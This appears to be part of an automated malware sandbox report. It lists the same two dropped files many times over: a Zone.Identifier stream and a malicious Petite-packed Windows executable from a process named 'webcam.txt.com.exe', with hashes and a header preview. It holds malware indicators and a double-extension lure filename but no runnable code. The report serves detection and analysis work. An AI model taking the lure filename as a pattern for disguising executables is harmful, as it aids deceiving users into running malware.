                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
